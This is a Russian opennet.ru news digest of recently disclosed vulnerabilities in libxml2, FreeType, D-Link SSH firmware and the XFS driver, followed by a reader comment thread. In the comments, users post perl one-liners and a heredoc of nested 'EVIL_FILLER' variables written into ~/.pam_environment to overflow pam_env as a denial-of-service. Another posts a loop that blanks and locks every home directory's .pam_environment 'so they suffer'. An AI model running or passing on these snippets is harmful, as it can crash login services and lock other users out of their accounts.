Несколько недавно обнаруженных уязвимостей:
- В открытой библиотеке Libxml2 найдены две уязвимости (http://secunia.com/advisories/46632/), вызванные обращением в коде к уже освобождённым блокам памяти. Теоретически уязвимости могут быть использованы для организации выполнения кода злоумышленника при обработке специально оформленных XPath-запросов. Проблема устранена в Git-репозитории проекта;- В библиотеке для рендеринга шрифтов FreeType 2.4.7 (http://sourceforge.net/projects/freetype) устранена опасная уязвимость (http://sourceforge.net/projects/freetype/files/freetype2/2.4...), которая может привести к выполнению кода злоумышленника при обработке специально скомпонованного шрифта Type 1;
- В реализации SSH-сервера из состава прошивок некоторых продуктов D-Link (например, коммутаторы DES-3800 и беспроводные маршрутизаторы DWL-2100AP/DWL-3200AP) найдена опасная уязвимость (http://secunia.com/advisories/46637/), позволяющая удалённо выполнить свой код на оборуд...
URL:
Новость: http://www.opennet.me/opennews/art.shtml?num=32170
> Переполнение буфера в функции "xfs_readlink()" может привести к
> выполнению кода злоумышленника при монтировании специально
> оформленного XFS-раздела;Судя по патчу, надо сделать длиннющую, больше MAXPATHLEN, ссылку.
PAM :)
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print "A" x 256;' >> ~/.pam_environmentи ещё...
cat <<EOM >~/.pam_environmentEVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM
Как вариант
for users in `ls /home/`
do
echo -ne > $users/.pam_environment;
chown 65499:65499 $users/.pam_environment;
chmod 0000 $users/.pam_environment;
doneПущай мучаются :)
> EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBКстати, в debian не работает, пишет [pam_env]: unknown variable EVIL_FILLER_255 ...
очередной урожай уязвимостей ?Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL; - O_O !!!
Уязвимость в реализации AppArmor - я прям на бомбе замедленного действия )))
Возможность инициирования краха ядра - дважды )))!!!!В реализации SSH-сервера - а вот это интерестно, пригодится
А где взять новую прошивку для DWL-2100AP?